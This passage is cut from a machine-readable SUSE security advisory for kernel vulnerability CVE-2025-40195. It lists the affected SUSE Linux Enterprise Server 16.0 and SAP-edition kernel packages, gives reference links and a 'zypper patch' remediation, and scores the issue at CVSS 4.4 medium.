"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40195",
"url": "https://www.suse.com/security/cve/CVE-2025-40195"
},
{
"category": "external",
"summary": "SUSE Bug 1253500 for CVE-2025-40195",
"url": "https://bugzilla.suse.com/1253500"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
